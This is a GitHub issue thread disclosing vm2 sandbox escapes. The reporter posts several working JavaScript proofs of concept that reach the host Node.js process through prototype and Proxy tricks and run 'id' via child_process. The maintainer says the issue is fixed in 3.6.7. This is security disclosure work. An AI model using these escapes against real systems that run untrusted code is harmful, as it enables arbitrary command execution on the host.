### ISSUE TITLE
Break out of the Sandbox

### ISSUE THREAD

**Issue by XmiliaH** [patriksimek/vm2#178]
This code is able to get the host process variable
```JS
"use strict";
const {VM} = require('vm2');
const untrusted = `var process;
Object.prototype.has=(t,k)=>{
	process = t.constructor("return process")();
}
"" in Buffer.from;
process.mainModule.require("child_process").execSync("id").toString()`
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}
```

**Comment by XmiliaH** [comment]
This still works
```JS
"use strict";
const {VM} = require('vm2');
const untrusted = `
Object.defineProperty(Object.prototype, "apply", {set:function(o,v){
	delete Object.prototype.apply;
}});
Buffer.from("").constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()
`;
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}
```

**Comment by XmiliaH** [comment]
Now
```JS
"use strict";
const {VM} = require('vm2');
const untrusted = `
var oc = Object.create;
Object.create = (p,x)=> Object.defineProperty(oc(p,x),"get",{set(){},get:()=>(t,k,r)=>t.constructor("return process")()});
var process = Buffer.from.process;
Object.create = oc;
process
`
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}
```
works

**Comment by XmiliaH** [comment]
This works
```JS
var process;
Object.defineProperty(Object.prototype, "set", {get(){
	delete Object.prototype.set;
	Object.defineProperty(Object.prototype, "get", {get(){
		delete Object.prototype.get;
		throw new Proxy(Object.create(null),{
			set(t,k,v){
				process = v.constructor("return process")();
				return true;
			}
		});
	},configurable:true});
	return ()=>{};
},configurable:true});
try{
	Object.defineProperty(Buffer.from(""),"",{});
}catch(e){
	e.x = Buffer.from;
}
process
```
It's only the vm code.

**Comment by XmiliaH** [comment]
This also works
```JS
"use strict";
const {VM} = require('vm2');
const untrusted = `
Object.__defineGetter__(Symbol.hasInstance,()=>()=>true);
Buffer.from.constructor("return process")().mainModule.require("child_process").execSync("id").toString()
`;
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}
```

**Comment by patriksimek** [comment]
Fixed in 3.6.7.
